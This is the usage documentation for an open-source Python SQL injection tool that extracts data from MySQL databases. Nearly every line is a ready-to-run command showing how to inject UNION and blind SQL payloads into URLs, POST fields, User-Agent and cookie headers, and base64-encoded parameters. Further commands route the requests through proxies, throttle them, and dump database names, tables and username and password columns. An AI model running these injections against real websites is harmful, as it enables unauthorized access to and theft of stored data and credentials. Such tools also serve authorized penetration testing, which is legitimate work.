This is a open source SQL dumper written in python.
Bugs and suggestions at : tdx_ev@yahoo.com | GPG-PuK
Features:
- Databases support : MySQL
- Injection methods : INBAND, BLIND
- Injection in all parameters sent to server GET, POST, HEADERS (Cookie, User-Agent,...)
- Custom headers
- Supports mod_rewrite injection
- Supports injection in parameters encoded in base64 algoritm
- Supports proxy (HTTP, SOCKET4, SOCKET5)
- Supports injection in HTTPS throw proxy (only socket)
- Supports custom user query injection
- Save all extracted data to a dump file
- Dumps only structure of database
- Increases delay between two consecutive failed requests (allow the server to chill down)
- Delay between requests
Command line options:
Example :
How to set URL option:
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php"
How to set URL option and GET parameters :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1"
How to make a SQL injection into URL option :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 and false union select 1,{inject_here}&page=index" --dbs
param_name=value¶m_name=value
GET parameters can be also send in the --url option.
Examples :
How to send GET parameters :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php" --params "page=index&id=1" --method GET
How to send POST parameters :
python dump.py --url "http://127.0.0.1/test/sqli/post/index.php" --params "page=index&id=1" --method POST
How to send GET and POST parameters same time:
python dump.py --url "http://127.0.0.1/test/sqli/post/index.php?page=index" --params "id=1" --method POST
- GET
- POST
Examples :
How to make a SQL injection into GET parameters (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php" --params "id=1 and false union select 1,{inject_here}&page=index" --method GET --dbs
How to make a SQL injection into GET parameters and also send POST parameters:
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 and false union select 1,{inject_here}&page=index" --params "list=10&offset=1" --method POST --dbs
How to make a SQL injection into POST parameters (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/post/index.php" --params "id=1 and false union select 1,{inject_here}" --method POST --dbs
How to make a SQL injection into POST parameters and also send GET parameters:
python dump.py --url "http://127.0.0.1/test/sqli/post/index.php?page=usercp" --params "id=1 and false union select 1,{inject_here}" --method POST --dbs
For default the script send "Python SQL Dumper" string as User-Agent.
Example :
How to send a custom User-Agent header (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --user-agent "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0.1) Gecko/20100101 Firefox/5.0.1" --dbs
How to make SQL injection into a User-Agent header (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/useragent/index.php" --user-agent "' union select 1,{inject_here} -- --" --dbs
Cookie data must be send as cookie_name=cookie_value separated by semicolon example:
bbsessionhash=4b555c89b39eae8546cbf3c6f63a20ba; bblastvisit=1312053111;
For default the script send no cookie header.
Examples :
How to send a cookie header (cookie authentication) (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/cookie/index.php?id=1 union select 1,{inject_here}" --cookie "USER_ID=1; bbsessionhash=4b555c89b39eae8546cbf3c6f63a20ba; bblastvisit=1312053111;" --dbs
How to make a SQL injection into a cookie header (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/cookie/index.php" --cookie "USER_ID=1 union select 1,{inject_here}" --dbs
Proxy must by in this format:
username:password@ip:port
or if no user name and password is needed the format will be this ip:port
By default the script will not use any proxy and no warning message will be shown.If no proxy type is specified the script will try to use HTTP proxy type.
Examples :
How to set proxy user name, password, ip and port :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --proxy "tdxev:password@127.0.0.1:1080" --dbs
How to set proxy ip and port :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --proxy "127.0.0.1:1080" --dbs
Proxy type must be on of the following:
- HTTP
- SOCKET4
- SOCKET5
Examples :
How to set proxy as socket5 :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --proxy "127.0.0.1:1080" --proxy-type SOCKET5
By default it set zero seconds
Examples :
How to set delay between requests (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dbs --delay "0.5"
- INBAND - the result is returned in the content of the page
- BLIND - the result is not displayed in the page but the page is looking differently depending on the SQL query
Examples :
How to set INBAND SQL injection (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 and false union select 1,{inject_here}" --injection-method INBAND --dbs
How to set BLIND SQL injection (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 {inject_here}" --injection-method BLIND --string "Welcome" --dbs
Examples :
How to set the string option for the blind SQL injection (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 {inject_here}" --injection-method BLIND --string "Welcome" --dbs
Examples :
How to extract all database names (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dbs
The database from whitch the tables names will be extracted must be specified with -D option.
Examples :
How to extract all table names from all databases (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --tables
The above command will extract all table names all databases.
How to extract all table names from multiple databases (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --tables -D test_sqli,mysql
The above command will extract all tables names from databases test_sqli and mysql.
How to extract all table names from a database (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --tables -D test_sqli
The above command will extract all table names from database test_sqli and mysql.
Use -T option to specify the table(s) and -D option to specify the database(s).
Examples :
How to extract all column names for all tables from all databases (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns
The above command will extract all column names for all the tables from all the databases.
How to extract all column names for all tables from multiple databases (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns -D test_sqli,mysql
The above command will extract all column names for all tables in the databases test_sqli and mysql.
How to extract all column names for all tables from a database (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns -D test_sqli
The above command will extract all column names for all tables in the database test_sqli
How to extract all column names for multiple tables from a database (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns -D test_sqli -T users,users_old
The above command will extract all column names for tables users and users_old from database test.
How to extract all column names from a single table (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns -D test_sqli -T users
The above command will extract all column names for table users from database test_sqli.
To specify a column or multiple columns you must use -C option , -T for table(s), -D for database(s) or no option to dump all databases content.
When multiple columns are used, the names of tables or databases must be separated by comma.
Examples :
How to dump data from a single column (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli -T users -C password
The above command will extract all rows content of password column from table users that is in database test_sqli.
How to dump data from multiple columns (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli -T users -C username,password
The above command will extract all rows content of username and password columns from table users that is in database test_sqli.
How to dump data from single table (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli -T users
The above command will extract all rows content of all columns from table users that is in database test_sqli.
How to dump data from multiple tables (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli -T users,users_old
The above command will extract all rows content of all columns from tables users and users_old that is in database test_sqli.
How to dump data from entire database (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli
The above command will extract all rows content of all columns for all tables in database test_sqli.
How to dump data from entire databases (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli,mysql
The above command will extract all rows content of all columns from all tables in the databases test_sqli and mysql.
How to dump data from all databases (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump
The above command will extract all rows content of all columns from all tables in all databases that the user have access to.
Sintax : --limit (start_pos),(number_of_rows_to_extract)
Sintax examples:
--limit 0,10 - will extract first 10 rows
--limit 5 - will extract all rows starting from row 5
--limit 10,5 - will extract 5 rows starting from row 10
Examples :
How to use limit with --dump option (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli -T users -C username,password --limit 0,10
The above command will extract the first 10 rows from username and password columns from users table from database test_sqli.
How to use limit with --dbs option (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dbs --limit 0,1
The above command will extract only the first database.
How to use limit with --tables option (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --tables -D test_sqli --limit 2,5
The above command will extract 5 tables names starting from row 2 from database test_sqli.
How to use limit with --columns option (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns -D test_sqli -T users --limit 1
The above command will extract all column names starting from row 1 from table users in database test_sqli.
If you use more that one database you must use comma to separate the names of databases (ex. -D "information_schema,test").
Examples :
How to set a single database that will be used to extract data (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --tables -D test_sqli
How to set multiple databases that will be used to extract data (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --tables -D test_sqli,mysql
If you use more that one table you must use comma to separate the names of tables (ex. -T "users,users_old").
Examples :
How to set a single table that will be used to extract data (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns -D test_sqli -T users
How to set multiple tables that will be used to extract data (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns -D test_sqli -T users,users_old
If you use more that one column you must use comma to separate the names of columns (ex. -C "username,password").
Examples :
How to set a single column that will be used to extract data (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli -T users -C username
How to set multiple columns that will be used to extract data (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli -T users -C username,password
Examples :
How to execute custom query (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --query "select @@version"
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --query "select username from users limit 1,1"
- 0 - no information will be displayed
- 1 - extracted information from data base
- 2 - all from 1 + SQL query that has been injected
- 3 - all from 2 + URL and all parameters
- 4 - all from 3 + server response headers
- 5 - all from 4 + content of the received page
Examples :
How to use verbose option (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dbs -v 2
Other options:
- base64 - text will be encoded in base64
- hex - text will be encoded in hex
- sqlhex - text will be encoded in hex and before the hex text it will place "0x"
{encode|base64}{encode|hex}word{/encode}{/encode}
will be encoded to : 'Nzc2ZjcyNjQ='
Example :
How to inject base64 encoded parameter :
python dump.py --url "http://127.0.0.1/test/sqli/base64/index.php?id={encode|base64}1 union select 1,{inject_here}{/encode}" --dbs
How to list :
- How to set URL option
- How to set URL option and GET parameters
- How to make a SQL injection into URL option
- How to send GET parameters
- How to send POST parameters
- How to send GET and POST parameters same time
- How to make a SQL injection into GET parameters
- How to make a SQL injection into GET parameters and also send POST parameters
- How to make a SQL injection into POST parameters
- How to make a SQL injection into POST parameters and send also GET parameters
- How to send a custom User-Agent header
- How to make SQL injection into a User-Agent header
- How to send a cookie header (cookie autentification)
- How to make a SQL injection into a cookie header
- How to set proxy user name, password, ip and port
- How to set proxy ip and port
- How to set proxy as socket5
- How to set delay between requests
- How to set INBAND SQL injection
- How to set BLIND SQL injection
- How to set the string option for the BLIND SQL injection
- How to extract all database names
- How to extract all table names from all databases
- How to extract all table names from multiple databases
- How to extract all table names from a database
- How to extract all column names for all tables from all databases
- How to extract all column names for all tables from multiple databases
- How to extract all column names for all tables from a database
- How to extract all column names for multiple tables from a database
- How to extract all column names from a single table
- How to dump data from a single column
- How to dump data from multiple columns
- How to dump data from single table
- How to dump data from multiple tables
- How to dump data from entire database
- How to dump data from entire databases
- How to dump data from all databases
- How to use limit with --dump option
- How to use limit with --dbs option
- How to use limit with --tables option
- How to use limit with --columns option
- How to set a single database that will be use to extract data
- How to set multiple databases that will be used to extract data
- How to set a single table that will be use to extract data
- How to set a multiple tables that will be used to extract data
- How to set a single column that will be use to extract data
- How to set a multiple columns that will be used to extract data
- How to execute custom query
- How to use verbose option
- How to inject base64 encoded parameter
- How to make a SQL injection in apache mode_rewrite URL